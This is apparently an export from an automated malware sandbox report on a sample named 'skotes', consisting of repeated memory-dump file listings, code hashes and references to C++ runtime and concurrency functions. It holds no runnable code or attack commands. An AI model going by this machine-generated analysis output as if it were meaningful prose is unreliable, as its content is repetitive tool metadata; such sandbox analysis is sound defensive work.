                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1321587334-0
                                                                                                                                                                                                                                              • Opcode ID: 2416da1222804ec48a2ec6615e883893d137210d87a6d79f15069d2b01150744
                                                                                                                                                                                                                                              • Instruction ID: 049c2eef3de8e720022772dfecc094d220d2146626b00bb38169d1f32e790de4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2416da1222804ec48a2ec6615e883893d137210d87a6d79f15069d2b01150744
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C281BD31A2161E9BCB18DFA8D8916BDFBF1FF48304B2480ADD645E7251D730AE49CB90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00BF6A1F
                                                                                                                                                                                                                                              • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00BF6A51
                                                                                                                                                                                                                                              • List.LIBCONCRT ref: 00BF6A8C
                                                                                                                                                                                                                                              • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00BF6A9D
                                                                                                                                                                                                                                              • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00BF6AB9
                                                                                                                                                                                                                                              • List.LIBCONCRT ref: 00BF6AF4
                                                                                                                                                                                                                                              • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00BF6B05
                                                                                                                                                                                                                                              • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00BF6B20
                                                                                                                                                                                                                                              • List.LIBCONCRT ref: 00BF6B5B
                                                                                                                                                                                                                                              • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00BF6B68
                                                                                                                                                                                                                                                • Part of subcall function 00BF5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00BF5EF7
                                                                                                                                                                                                                                                • Part of subcall function 00BF5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00BF5F09
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3403738998-0
                                                                                                                                                                                                                                              • Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                                                                                              • Instruction ID: 48ae19abf1588562595898201152471f3e7df445d4ad9b06897b8e9230a1a83e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB512071A0020DABDB18DF64C595BFDB3E8FF08344F1541A9EA15EB242DB70AE49CB90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 00C053A0
                                                                                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 00C053C7
                                                                                                                                                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 00C054D3
                                                                                                                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 00C055AE
                                                                                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 00C05650
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                              • API String ID: 4162181273-393685449
                                                                                                                                                                                                                                              • Opcode ID: bfae4695d3c9be3cef404b28a6c461604fdb02e05a39bf7f7c95651f0b4aa60a
                                                                                                                                                                                                                                              • Instruction ID: 824e33263c6af6796bcc96a5075e41d89ea5c2c92d374e8d3ea4df5878fcdefc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfae4695d3c9be3cef404b28a6c461604fdb02e05a39bf7f7c95651f0b4aa60a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3C19AB1900A09DFCF29DFA4C8819AFBBB9BF14311F10415AF9216B292C771DA51CF91
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00BF73B0
                                                                                                                                                                                                                                              • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00BF73F2
                                                                                                                                                                                                                                              • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 00BF740E
                                                                                                                                                                                                                                              • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00BF7419
                                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BF7440
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                              • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                                                                              • API String ID: 3897347962-3650809737
                                                                                                                                                                                                                                              • Opcode ID: 59bb6b6acb7e4b10766329a86c7fdee2b0bfe474a1eb522002b32c470d357f46
                                                                                                                                                                                                                                              • Instruction ID: 041464a129ebbe180f559109ddfc0e5fc4e1a0220ef26e53a984c1ac795c5f08
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59bb6b6acb7e4b10766329a86c7fdee2b0bfe474a1eb522002b32c470d357f46
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91212C34A0020DAFCB14EF69C595ABDBBF5EF09310F1440E9EA15A7361CB30AE09DB94
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00BF7903
                                                                                                                                                                                                                                                • Part of subcall function 00BF5CB8: __EH_prolog3_catch.LIBCMT ref: 00BF5CBF
